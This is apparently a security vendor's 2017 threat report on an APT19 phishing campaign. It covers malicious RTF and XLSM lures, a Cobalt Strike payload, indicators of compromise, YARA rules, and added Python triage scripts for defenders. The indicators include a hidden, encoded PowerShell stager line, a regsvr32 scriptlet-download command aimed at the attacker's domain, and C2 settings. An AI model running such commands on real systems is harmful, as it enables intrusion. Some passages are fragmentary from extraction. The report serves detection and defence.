# Phished at the Request of Counsel

**[fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html](https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html)**

## Summary

In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in [CVE-2017-0199](https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html). Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.

As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.

The purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.

## The Emails

APT19 phishing emails from this campaign originated from sender email accounts on the "@cloudsend[.]net" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.

## The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.
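The Emails section names the sender domain and the two attachment types used for the lures, and recommendation 2 later in the post asks defenders to search historic and future mail for the listed indicators. The following Python filter is an added example, not FireEye's code or tooling: it walks constructed mail-gateway records (the `key="value"` record format, the field names and every record are assumptions; the subjects and attachment names reuse entries listed under Indicators of Compromise) and flags a message by sender domain, by lure attachment type (`.rtf`, `.xlsm`) and by the `.doc.rtf` double extension the RTF lure names carry.

```python
"""Mail-record triage against the sender domain and attachment types in the post.
Added example; the record format, field names and all sample records are constructed."""
import re
from dataclasses import dataclass, field

SENDER_DOMAIN = "cloudsend.net"          # sender domain named in "The Emails"
LURE_EXTENSIONS = (".rtf", ".xlsm")     # attachment types used by the campaign
# "<name>.doc.rtf" hides the real extension behind a familiar one.
DOUBLE_EXT = re.compile(r"\.doc\.rtf$", re.IGNORECASE)
FIELD = re.compile(r'(\w+)="([^"]*)"')  # constructed key="value" record format


@dataclass
class Finding:
    message_id: str
    reasons: list = field(default_factory=list)


def parse_record(line):
    """Split one key="value" record into a dict (assumed log format)."""
    return {key: value for key, value in FIELD.findall(line)}


def triage_record(rec):
    """Return a Finding for one parsed record, or None when nothing matches."""
    reasons = []
    sender = rec.get("from", "").lower()
    if sender.endswith("@" + SENDER_DOMAIN):
        reasons.append("sender domain " + SENDER_DOMAIN)
    # Attachments are ';'-separated in the constructed format; skip empty names.
    for name in filter(None, rec.get("attachments", "").split(";")):
        lower = name.lower()
        if lower.endswith(LURE_EXTENSIONS):
            reasons.append("attachment type " + lower.rsplit(".", 1)[1] + ": " + name)
        if DOUBLE_EXT.search(name):
            reasons.append("double extension (.doc.rtf): " + name)
    return Finding(rec.get("id", "?"), reasons) if reasons else None


def triage(lines):
    """Run triage over an iterable of records and keep only the hits."""
    findings = []
    for line in lines:
        hit = triage_record(parse_record(line))
        if hit:
            findings.append(hit)
    return findings


# Constructed records: m1 and m4 reuse sender and lure names listed in the post,
# m2 reuses an attachment name from an ordinary-looking sender, m3 is benign.
SAMPLE_LOG = [
    'id="m1" from="noreply@cloudsend.net" subject="Macron Denies Authenticity Of Leak, French Prosecutors Open Probe" attachments="Macron_Authenticity.doc.rtf"',
    'id="m2" from="partner@example.com" subject="Tables 4 5 7" attachments="Tables 4 5 7 Appendix with zeros.xlsm"',
    'id="m3" from="hr@example.com" subject="Lunch menu" attachments="menu.pdf"',
    'id="m4" from="sarah.roberto@cloudsend.net" subject="Vacancy Report" attachments=""',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding.message_id, "->", "; ".join(finding.reasons))
```

The sender check matches only the exact domain (a subdomain or look-alike would need its own rule), and the extension checks deliberately fire on any `.rtf` or `.xlsm` so that a lure from a sender not yet on the list still surfaces for review.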
## RTF Attachments

Through the exploitation of the HTA handler vulnerability described in [CVE-2017-0199](https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html), the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis.

Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

## XLSM Attachments

The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to "Enable Content", which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5: 30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a macro that:

1. Determined the system architecture to select the correct path for PowerShell
2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.
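The decoding chain just described (Base64 to DEFLATE to script text, then printable-ASCII extraction to pull NBIs out of shellcode, as in Figures 4 and 6 and again in Figure 11) and the alternate regsvr32/scrobj.dll launcher described under Figure 7 both start from a process command line, which is what an endpoint hunt has in hand. The Python below is an added example, not FireEye's code or the macro's own: it classifies a command line as one of the two variants and recovers the indicators it embeds. One detail the post's wording glosses over is that .NET `DeflateStream` emits raw DEFLATE with no zlib header, so `zlib.decompress` must be called with `wbits=-15`. The sample command line, the byte blob standing in for shellcode and the `.invalid` host names are all constructed.

```python
"""Command-line triage for the two XLSM macro variants in the post: the Base64 +
DEFLATE PowerShell stager and the regsvr32 /i:<url> scrobj.dll launcher.
Added example; samples and host names are constructed, not from the campaign."""
import base64
import re
import zlib

# Base64 argument as it appears in the macro's PowerShell one-liner.
B64_ARG = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
# Scriptlet URL handed to regsvr32 via /i: and executed through scrobj.dll.
SCROBJ_URL = re.compile(r"/i:(\S+)\s+scrobj\.dll", re.IGNORECASE)
# Flags from the process arguments listed under Host Based Indicators.
PS_FLAGS = ("-nop", "-noni", "-w hidden")
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
URL = re.compile(r"""https?://[^\s'")]+""")


def inflate_stager(b64_blob):
    """Base64 -> DEFLATE -> script text. DeflateStream writes raw DEFLATE with no
    zlib header, hence wbits=-15 instead of the default."""
    return zlib.decompress(base64.b64decode(b64_blob), -15).decode("utf-8", "replace")


def printable_strings(data):
    """Runs of printable ASCII (4+ chars): the quick NBI pull from shellcode."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(data)]


def indicators_from_script(script):
    """Clear-text URLs plus printable runs from any embedded Base64 byte array
    (the $var_code step in Figure 11)."""
    found = set(URL.findall(script))
    for blob in B64_ARG.findall(script):
        found.update(printable_strings(base64.b64decode(blob)))
    return sorted(found)


def triage_command_line(cmd):
    """Return {"variant", "script", "indicators"} for a matching command line, else None."""
    lower = cmd.lower()
    if "powershell" in lower and all(flag in lower for flag in PS_FLAGS):
        match = B64_ARG.search(cmd)
        if match:
            script = inflate_stager(match.group(1))
            return {"variant": "powershell-stager", "script": script,
                    "indicators": indicators_from_script(script)}
    if "regsvr32" in lower and "scrobj.dll" in lower:
        match = SCROBJ_URL.search(cmd)
        return {"variant": "regsvr32-scrobj", "script": None,
                "indicators": [match.group(1)] if match else []}
    return None


def build_sample_command(host):
    """Constructed stand-in for the macro's command line. The blob imitates shellcode
    only in that a host name and a URI sit between non-printable bytes."""
    blob = b"\x90" * 8 + host.encode() + b"\x00\xe8\x00\x00\x00\x00/submit.php\x00"
    script = '[Byte[]]$var_code = [Convert]::FromBase64String("%s")\n' % (
        base64.b64encode(blob).decode())
    packer = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw DEFLATE, like DeflateStream
    packed = base64.b64encode(packer.compress(script.encode()) + packer.flush()).decode()
    return ('powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression '
            '$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream '
            '($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("%s")))), '
            '[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"'
            % packed)


# Constructed; shape follows the regsvr32 line under Host Based Indicators.
REGSVR32_SAMPLE = "regsvr32.exe /s /n /u /i:https://lyncdiscover.example.invalid/Autodiscover scrobj.dll"

if __name__ == "__main__":
    for line in (build_sample_command("autodiscover.example.invalid"),
                 REGSVR32_SAMPLE, "powershell.exe -Command Get-Date"):
        print(triage_command_line(line))
```

The flag check keys on the `-NoP -NonI -W Hidden` combination rather than on PowerShell alone, which keeps ordinary administrative use out of the results; the regsvr32 branch needs both `scrobj.dll` and a `/i:` URL, since either on its own has legitimate uses.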
Figure 6: Decoded shellcode

FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey Smith's ["Squiblydoo" Application Whitelisting bypass technique](http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html) to run the command in Figure 8.

1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the "$DoIt" string, which is usually indicative of a Cobalt Strike payload.

A quick conversion of the contents of the variable "$var_code" from Base64 to ASCII shows some familiar network indicators, shown in Figure 11.

Figure 11: $var_code to ASCII

## Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters:

```
Process Inject Targets:
    %windir%\syswow64\rundll32.exe
    %windir%\sysnative\rundll32.exe
c2_user_agents:
    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
Named Pipes:
    \\%s\pipe\msagent_%x
beacon_interval: 60
C2:
    autodiscover.2bunny[.]com/submit.php
    autodiscover.2bunny[.]com/IE9CompatViewList.xml
    sfo02s01-in-f2.cloudsend[.]net/submit.php
    sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
C2 Port: TCP/80
```

Figure 12: Cobalt Strike BEACON C2

## FireEye Product Detections

The following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product.
| Detection Name | Product | Action | Notes |
|---|---|---|---|
| SUSPICIOUS POWERSHELL USAGE (METHODOLOGY) | HX | Detect | XLSM macro launch |
| Gen:Variant.Application.HackTool.CobaltStrike.1 | HX | Detect | XLSM macro launch |
| Malware Object | HX | Detect | BEACON written to disk |
| Backdoor.BEACON | NX | Block* | BEACON callback |
| FE_Malformed_RTF | EX/ETP/NX | Block* | RTF |
| Malware.Binary.rtf | EX/ETP/NX | Block* | RTF |
| Malware.Binary | EX/ETP/NX | Block* | RTF |
| Malware.Binary.xlsx | EX/ETP/NX | Block* | XLSM |

Table 1: Detection review

_*Appliances must be configured for block mode._

## Recommendations

FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:

1. Microsoft Office users should apply [the patch from Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199) as soon as possible, if they have not already installed it.
2. Search historic and future emails that match the included indicators of compromise.
3. Review web proxy logs for connections to the included network-based indicators of compromise.
4. Block connections to the included fully qualified domain names.
5. Review endpoints for the included host-based indicators of compromise.

## Indicators of Compromise

The following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye

## Email Senders

- PressReader
- Angela Suh
- Ashley Safronoff
- Lindsey Hersh
- Sarah Roberto
- sarah.roberto@cloudsend[.]net
- noreply@cloudsend[.]net

## Email Subject Lines

- Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
- Macron Document Leaker Releases New Images, Promises More Information
- Are Emmanuel Macron's Tax Evasion Documents Real?
- Time Allocation
- Vacancy Report
- china paper table and graph results with zeros – some ready not all finished
- Macron Leaks contain secret plans for the islamisation of France and Europe

## Attachment Names

- Macron_Authenticity.doc.rtf
- Macron_Information.doc.rtf
- US and EU Trade with China and China CA.xlsm
- Tables 4 5 7 Appendix with zeros.xlsm
- Project Codes - 05.30.17.xlsm
- Weekly Vacancy Status Report 5-30-15.xlsm
- Macron_Tax_Evasion.doc.rtf
- Macron_secret_plans.doc.rtf

## Network Based Indicators (NBI)

- lyncdiscover.2bunny[.]com
- autodiscover.2bunny[.]com
- lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
- sfo02s01-in-f2.cloudsend[.]net/submit.php
- sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
- tk-in-f156.2bunny[.]com
- tk-in-f156.2bunny[.]com/Agreement.doc
- 104.236.77[.]169
- 138.68.45[.]9
- 162.243.143[.]145
- Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
- tf-in-f167.2bunny[.]com:443 (*Only seen in VT, not ITW)

## Host Based Indicators (HBI)

**RTF MD5 hash values**

- 0bef39d0e10b1edfe77617f494d733a8
- 0e6da59f10e1c4685bb5b35a30fc8fb6
- cebd0e9e05749665d893e78c452607e2

**XLSX MD5 hash values**

- 38125a991efc6ab02f7134db0ebe21b6
- 3a1dca21bfe72368f2dd46eb4d9b48c4
- 30f149479c02b741e897cdb9ecd22da7

**BEACON and Meterpreter payload MD5 hash values**

- bae0b39197a1ac9e24bdf9a9483b18ea
- 1151619d06a461456b310096db6bc548

**Process arguments, named pipes, and file paths**

```
powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""
regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
\\\pipe\msagent_<4 digits>
C:\Documents and Settings\\Local Settings\Temp\K5om.dll   (4 character DLL based on URI of original GET request)
```

## Yara Rules

The rule names were lost in extraction; the names below are placeholders and are not the names FireEye published.

```yara
// Placeholder name: the original rule name did not survive extraction.
rule apt19_phish_macro_placeholder_1
{
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "Ian.Ahl@fireeye.com @TekDefense"
        date = "2017-06-02"
        description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
    strings:
        // OBSFUCATION
        $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
        $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
        $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
        $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
        $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
        $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
        $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
        $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
        $obreg1 = /(\w{5}\s&\s){7}\w{5}/
        $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/
        // wscript
        $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
        $wsobj2 = "Obj.Run " ascii wide
    condition:
        (
            ( (uint16(0) != 0x5A4D) )
            and
            (
                all of ($wsobj*) and 3 of ($ob*)
                or all of ($wsobj*) and all of ($obreg*)
            )
        )
}
```

```yara
// Placeholder name: the original rule name did not survive extraction.
rule apt19_phish_macro_placeholder_2
{
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "Ian.Ahl@fireeye.com @TekDefense"
        date = "2017-06-02"
        description = "This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file 3a1dca21bfe72368f2dd46eb4d9b48c4."
    strings:
        // Setting the environment
        $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
        $env2 = "windir = Environ(\"windir\")" ascii wide
        $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
        // powershell command fragments
        $ps1 = "-NoP" ascii wide
        $ps2 = "-NonI" ascii wide
        $ps3 = "-W Hidden" ascii wide
        $ps4 = "-Command" ascii wide
        $ps5 = "New-Object IO.StreamReader" ascii wide
        $ps6 = "IO.Compression.DeflateStream" ascii wide
        $ps7 = "IO.MemoryStream" ascii wide
        $ps8 = ",$([Convert]::FromBase64String" ascii wide
        $ps9 = "ReadToEnd();" ascii wide
        $psregex1 = /\W\w+\s+\s\".+\"/
    condition:
        (
            ( (uint16(0) != 0x5A4D) )
            and
            (
                all of ($env*) and 6 of ($ps*)
                or all of ($env*) and 4 of ($ps*) and all of ($psregex*)
            )
        )
}
```

```yara
// Placeholder name: the original rule name did not survive extraction.
rule apt19_phish_rtf_placeholder
{
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "joshua.kim@FireEye.com"
        date = "2017-06-02"
        description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
    strings:
        $header = "{\\rt"
        $lnkinfo = "4c0069006e006b0049006e0066006f"
        $encoded1 = "4f4c45324c696e6b"
        $encoded2 = "52006f006f007400200045006e007400720079"
        $encoded3 = "4f0062006a0049006e0066006f"
        $encoded4 = "4f006c0065"
        $http1 = "68{"
        $http2 = "74{"
        $http3 = "07{"
        // 2bunny.com
        $domain1 = "32{\\"
        $domain2 = "62{\\"
        $domain3 = "75{\\"
        $domain4 = "6e{\\"
        $domain5 = "79{\\"
        $domain6 = "2e{\\"
        $domain7 = "63{\\"
        $domain8 = "6f{\\"
        $domain9 = "6d{\\"
        $datastore = "\\*\\datastore"
    condition:
        $header at 0 and all of them
}
```

## Acknowledgements

Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer